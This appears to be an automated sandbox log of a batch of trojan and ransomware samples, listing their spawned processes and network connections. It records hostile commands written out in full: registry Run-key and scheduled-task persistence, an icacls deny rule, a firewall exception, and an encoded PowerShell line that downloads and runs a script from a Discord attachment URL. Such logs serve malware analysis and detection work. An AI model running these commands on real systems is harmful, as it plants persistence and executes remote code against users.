HEUR-Trojan.MSIL.Crypt.gen-5d6272028e58571ac67a39a449ccd6666dad00ecc4fd457db918e4448284f236.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-615ae4e917dab894699846dc78a8c9daf07fcbe5f4ad06483b8a4a5bd17d9e4e.exe
HEUR-Trojan.MSIL.Crypt.gen-615ae4e917dab894699846dc78a8c9daf07fcbe5f4ad06483b8a4a5bd17d9e4e.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-67476b6ffbd142ade3dd16f0f91673a04b0cd10262afea29bc20ddb26a087404.exe
HEUR-Trojan.MSIL.Crypt.gen-67476b6ffbd142ade3dd16f0f91673a04b0cd10262afea29bc20ddb26a087404.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-6a4dc64b7df47c9397fccb7f9cf098737cfff9747a8970c039e88d226ced69bd.exe
HEUR-Trojan.MSIL.Crypt.gen-6a4dc64b7df47c9397fccb7f9cf098737cfff9747a8970c039e88d226ced69bd.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-813797b7a9acf4262cf567f0cbe09ebd6be5d5c446ebe4fa5c147e7b94bf5ad4.exe
HEUR-Trojan.MSIL.Crypt.gen-813797b7a9acf4262cf567f0cbe09ebd6be5d5c446ebe4fa5c147e7b94bf5ad4.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-ade170d43b102f5e2910339388771eea6b75308124d4bfdb840672d522ad4596.exe
HEUR-Trojan.MSIL.Crypt.gen-ade170d43b102f5e2910339388771eea6b75308124d4bfdb840672d522ad4596.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c234fec6829e93fc69b390373b9d7bcea9ed5772f3674b842a4e943c3edbf320.exe
HEUR-Trojan.MSIL.Crypt.gen-c234fec6829e93fc69b390373b9d7bcea9ed5772f3674b842a4e943c3edbf320.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe
HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c85da5228d681603c78ae24ac58f26c7eeb812eca581cc955db4de51d8442661.exe
HEUR-Trojan.MSIL.Crypt.gen-c85da5228d681603c78ae24ac58f26c7eeb812eca581cc955db4de51d8442661.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6424 -ip 6424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5764 -ip 5764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 852
C:\Users\Admin\AppData\Local\Temp\53e8df59-9b95-4af3-8955-1253b4c6949c.exe
"C:\Users\Admin\AppData\Local\Temp\53e8df59-9b95-4af3-8955-1253b4c6949c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 1068
C:\Users\Admin\AppData\Local\Temp\b9119bd7-bed8-4618-b746-cf10336f7a3c.exe
"C:\Users\Admin\AppData\Local\Temp\b9119bd7-bed8-4618-b746-cf10336f7a3c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7724 -ip 7724
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-db4f98133dd11d5b6a6e894c777bae318b8beb17effe21283ca133a39e461a3c.exe
HEUR-Trojan.MSIL.Crypt.gen-db4f98133dd11d5b6a6e894c777bae318b8beb17effe21283ca133a39e461a3c.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1576
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM wscript.exe
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM cmd.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn NYAN /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn NYAN /tr "C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe" /sc minute /mo 1
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-e134a6c799de4a4705eebb7fd139c9c1b1f0a2e8b527e732ee7a40fdc5f49ee4.exe
HEUR-Trojan.MSIL.Crypt.gen-e134a6c799de4a4705eebb7fd139c9c1b1f0a2e8b527e732ee7a40fdc5f49ee4.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\16c1003b-816c-457b-b10c-d0fbd651148b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-ebaa163e986e04be1995759c109497df965f7b601eec73d3a280318b9f5c501d.exe
HEUR-Trojan.MSIL.Crypt.gen-ebaa163e986e04be1995759c109497df965f7b601eec73d3a280318b9f5c501d.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
"C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
"C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM wscript.exe
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM cmd.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn NYAN /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /sc minute /mo 1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Roaming\model\print.exe
"C:\Users\Admin\AppData\Roaming\model\print.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe" "explorer.DLL.exe" ENABLE
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM wscript.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\TASKKILL.exe
TASKKILL /F /IM cmd.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn NYAN /F
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /sc minute /mo 1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
C:\Users\Admin\Desktop\00486\Setup.exe
"C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Users\Admin\Desktop\00486\smss.exe
"C:\Users\Admin\Desktop\00486\smss.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaf87746f8,0x7ffaf8774708,0x7ffaf8774718
C:\Users\Admin\AppData\Local\Temp\is-021EK.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-021EK.tmp\Setup.tmp" /SL5="$30784,3291817,140800,C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com.tr | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 158.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 244.244.23.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gist.githubusercontent.com | udp |
| US | 185.199.110.133:443 | gist.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bossdata.pro | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 121.144.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.65.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
